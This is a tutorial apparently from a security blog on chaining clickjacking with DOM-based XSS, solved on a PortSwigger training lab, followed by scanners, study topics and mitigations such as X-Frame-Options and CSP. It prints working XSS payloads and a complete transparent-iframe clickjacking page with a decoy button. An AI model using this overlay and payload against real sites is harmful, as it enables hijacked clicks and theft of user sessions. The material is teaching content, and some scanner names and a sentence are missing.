05 Mar, 2024

Clickjacking chained with DOM-Based XSS

Clickjacking and DOM-Based Cross-Site Scripting (XSS) are both web security vulnerabilities, and when combined, they can create a more sophisticated and dangerous attack scenario.


Clickjacking:

Description: Clickjacking, also known as UI redressing, involves tricking a user into clicking on something different from what the user perceives. This is often achieved by overlaying a transparent frame or button on a seemingly legitimate clickable element.

Attack Scenario: An attacker may embed a target website within an iframe and overlay transparent elements, tricking the user into interacting with the visible elements while unknowingly interacting with the invisible elements of the target site.

DOM-Based XSS:

Description: DOM-Based XSS occurs when a web application’s client-side scripts manipulate the Document Object Model (DOM) in an insecure way, allowing an attacker to inject malicious scripts that can be executed in the context of the user’s browser.

Attack Scenario: An attacker exploits vulnerabilities in client-side scripts to inject and execute malicious code within the user’s browser.

Chaining Clickjacking with DOM-Based XSS:

Attack Description:

An attacker may create a page with an embedded iframe that contains the target website.

The attacker overlays transparent elements on the visible part of the iframe, tricking the user into interacting with these elements.

Simultaneously, the attacker exploits a DOM-Based XSS vulnerability on the target site within the iframe.

The injected script steals sensitive information or performs malicious actions on behalf of the user without their knowledge.

Example Scenario:

An attacker creates a fake login page for a popular social media site.

The attacker embeds the actual social media site within an iframe, making it invisible to the user.

Transparent buttons are placed over the login button of the social media site, tricking the user into unknowingly clicking the login button.

Simultaneously, a DOM-Based XSS payload is injected into the social media site, stealing the user’s login credentials.

Examples of exploitation

To better understand the Stored DOM XSS vulnerability, let’s take a look at one of the labs from PortSwigger, a well-known web security company. This lab demonstrates a Stored DOM XSS vulnerability in blog comment functionality. To solve this lab, exploit this vulnerability to call the alert() function.

As we can see, we have 4 fields for entering information.

Insert this payload: <img src=0 onerror=alert(1)>

As we can see the vulnerability worked.

We take this URL to build the clickjacking page:

<iframe src="https://0a4f007403fca1a68013d0b3001400be.web-security-academy.net/feedback"></iframe>

As we can see, the clickjacking worked. Next we add the following:

<style>
    iframe {
        position: relative;
        width: 1000px;
        height: 900px;
        opacity: 0.1;
        z-index: 2;
    }
    div {
        position: absolute;
        top: 815px;
        left: 50px;
        z-index: 1;
    }
</style>
<div>CLICK HERE</div>
<iframe src="https://0a4f007403fca1a68013d0b3001400be.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=a@a.com&subject=test&message=test"></iframe>

That's how it looks now. When the user presses “CLICK HERE

As we can see the vulnerability worked.

Scanners that detect vulnerabilities

Burp Suite:

Description: A comprehensive web application security testing tool that includes features for scanning, crawling, and analyzing web applications.

OWASP ZAP (Zed Attack Proxy):

Description: An open-source security tool designed for finding vulnerabilities in web applications.


Description: A web application security scanner that automates the detection of vulnerabilities, including XSS.


Description: A vulnerability scanner for web applications that includes features for finding XSS and other vulnerabilities.

Average CVSS score

Assigning a specific Common Vulnerability Scoring System (CVSS) score for “Clickjacking Chained with DOM-Based XSS” can be challenging, as the score depends on various factors such as the impact, exploitability, and mitigating factors specific to each vulnerability.

To study

Understand Clickjacking:

Definition: Research and understand what Clickjacking is and how it works.

Mitigations: Learn about frame-busting techniques, X-Frame-Options header, and other methods to prevent Clickjacking.

Understand DOM-Based XSS:

Definition: Explore what DOM-Based XSS is and how it differs from other forms of XSS.

Mitigations: Study techniques for input validation, output encoding, and the use of Content Security Policy (CSP) to prevent DOM-Based XSS.

Explore Chaining Vulnerabilities:

Definition: Learn the concept of chaining vulnerabilities and how combining Clickjacking with DOM-Based XSS increases the attack impact.

Real-World Examples: Look for documented cases or research papers that demonstrate or discuss the chaining of Clickjacking with DOM-Based XSS.

Hands-On Labs:

Setting Up a Lab Environment: Create a controlled environment using virtual machines or containers to practice and experiment safely.

Use Tools: Experiment with tools like Burp Suite, OWASP ZAP, or custom scripts to simulate and observe Clickjacking and DOM-Based XSS scenarios.

Web Application Testing:

Testing Tools: Familiarize yourself with web application testing tools that can help identify Clickjacking and XSS vulnerabilities.

OWASP WebGoat and DVWA: Practice on deliberately vulnerable applications like OWASP WebGoat or Damn Vulnerable Web Application (DVWA).

Learn Defensive Techniques:

Implementing Security Headers: Study how to implement security headers like X-Frame-Options and Content Security Policy (CSP) to mitigate these vulnerabilities.

Secure Coding Practices: Understand secure coding practices to prevent XSS and other client-side vulnerabilities.

Research and Articles:

Read Research Papers: Explore academic papers and articles related to Clickjacking, DOM-Based XSS, and their combinations.

Blogs and Tutorials: Follow blogs and tutorials from reputable sources that discuss real-world examples and mitigation strategies.

Conclusion and Mitigation

Clickjacking chained with DOM-Based XSS represents a sophisticated and dangerous attack scenario that leverages multiple vulnerabilities to compromise the security of web applications. Clickjacking involves deceiving users into interacting with unintended elements, while DOM-Based XSS allows attackers to inject and execute malicious scripts within the user’s browser. When these vulnerabilities are chained together, the potential impact on confidentiality, integrity, and availability is significant.

Mitigation Strategies:

Frame-Busting Techniques:

Implement frame-busting techniques to prevent your web application from being embedded within iframes on malicious sites.

X-Frame-Options Header:

Set the X-Frame-Options header to DENY or SAMEORIGIN to control whether your web pages can be embedded in iframes and mitigate the risk of clickjacking.

Content Security Policy (CSP):

Utilize Content Security Policy to define and enforce a set of rules that control the sources from which your web application can load resources, including scripts. This can help mitigate DOM-Based XSS.
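A way to check the framing defences described above from a captured set of response headers. This is an added example, not code from the original article; it goes slightly beyond the text by also reading the CSP frame-ancestors directive, which is the CSP counterpart of X-Frame-Options. The function names and the sample header objects are assumptions made for illustration.

```javascript
// Added example: classify whether a response can be framed by another origin.
// Function names are hypothetical; header names and directive names are the standard ones.

// Case-insensitive header lookup on a plain object of response headers.
function getHeader(headers, name) {
  const key = Object.keys(headers).find(k => k.toLowerCase() === name);
  return key ? String(headers[key]) : '';
}

// Return the frame-ancestors source list, or null when the directive is absent.
function frameAncestors(csp) {
  for (const directive of csp.split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === 'frame-ancestors') return sources.map(s => s.toLowerCase());
  }
  return null;
}

function framingVerdict(headers) {
  const sources = frameAncestors(getHeader(headers, 'content-security-policy'));
  if (sources !== null) {
    // An enforced frame-ancestors directive takes precedence over X-Frame-Options.
    if (sources.length === 0 || (sources.length === 1 && sources[0] === "'none'")) return 'blocked';
    if (sources.every(s => s === "'self'")) return 'same-origin only';
    if (sources.some(s => s === '*' || s === 'https:' || s === 'http:')) return 'framable';
    return 'allowlist: ' + sources.join(' ');
  }
  // Duplicate X-Frame-Options headers arrive comma-joined; conflicting values
  // are reported for review instead of guessing how a browser resolves them.
  const values = new Set(getHeader(headers, 'x-frame-options')
    .split(',').map(v => v.trim().toUpperCase()).filter(Boolean));
  if (values.size > 1) return 'conflicting';
  const [xfo] = values;
  if (xfo === 'DENY') return 'blocked';
  if (xfo === 'SAMEORIGIN') return 'same-origin only';
  // Missing header or an unrecognised value (for example the obsolete ALLOW-FROM,
  // which current browsers ignore) leaves the page framable.
  return 'framable';
}
```

A 'framable' verdict on a page with state-changing forms is the condition that lets the iframe overlay in the lab work.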

Input Validation and Output Encoding:

Implement strict input validation to ensure that user input is sanitized and adheres to expected formats.

Apply output encoding to sanitize user inputs before displaying them in the browser, preventing the execution of malicious scripts.
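The two steps above applied to the name parameter used in the lab URL, shown as a vulnerable "before" next to a hardened "after". This is an added example, not code from the original article or from the lab; the function names, the allowed-character rule and the fallback message are assumptions.

```javascript
// Added example: constructed stand-in for a feedback page that echoes ?name= back.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Output encoding for the HTML body context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// Input validation: letters, digits, space, dot, apostrophe and hyphen, 1 to 64 characters.
// The rule is an assumption about what a display name may contain.
function validName(name) {
  return typeof name === 'string' && /^[\p{L}\p{N} .'-]{1,64}$/u.test(name);
}

// Before: the parameter is concatenated into markup that would be assigned to innerHTML,
// so any tags in it are parsed by the browser.
function thanksUnsafe(search) {
  const name = new URLSearchParams(search).get('name') || '';
  return '<p>Thanks, ' + name + '</p>';
}

// After: reject unexpected input, then encode what remains for the HTML context.
function thanksSafe(search) {
  const name = new URLSearchParams(search).get('name') || '';
  if (!validName(name)) return '<p>Thanks for your feedback.</p>';
  return '<p>Thanks, ' + escapeHtml(name) + '</p>';
}

// Query string taken from the iframe URL shown earlier on the page.
const LAB_QUERY = '?name=<img src=1 onerror=print()>&email=a@a.com&subject=test&message=test';
```

In the browser, assigning the value to an element's textContent instead of innerHTML avoids HTML parsing of the value altogether.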

Security Awareness Training:

Educate developers, administrators, and users about the risks associated with clickjacking and XSS attacks. Encourage best practices for secure coding and safe web browsing.

Regular Security Audits:

Conduct regular security audits, including both automated and manual testing, to identify and address vulnerabilities in your web application.


Defense-in-Depth:

Implement a defense-in-depth strategy by employing multiple layers of security measures. This can include network-level controls, server-side controls, and client-side controls.

Update and Patching:

Keep all software components, including web servers, frameworks, and libraries, up to date with the latest security patches to address known vulnerabilities.

Monitoring and Incident Response:

Implement monitoring mechanisms to detect anomalous activities and potential attacks. Have an incident response plan in place to respond promptly to security incidents.

Collaborate with the Security Community:

Stay informed about emerging threats and vulnerabilities by actively participating in the security community. Share insights and collaborate to enhance overall security practices.
